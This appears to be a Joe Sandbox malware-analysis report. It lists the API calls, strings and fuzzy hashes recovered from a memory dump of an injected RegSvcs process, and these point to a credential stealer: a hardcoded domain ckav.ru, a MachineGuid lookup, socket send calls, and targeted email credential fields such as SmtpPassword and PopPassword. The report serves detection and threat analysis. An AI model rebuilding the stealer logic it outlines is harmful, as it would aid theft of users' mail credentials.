GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopServer, xrefs: 0040D099
SmtpServer, xrefs: 0040D0DC
PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
SmtpAccount, xrefs: 0040D0FA
Technology, xrefs: 0040D08D
PopPort, xrefs: 0040D0A7
SmtpPort, xrefs: 0040D0EB
EmailAddress, xrefs: 0040D074

Memory Dump Source

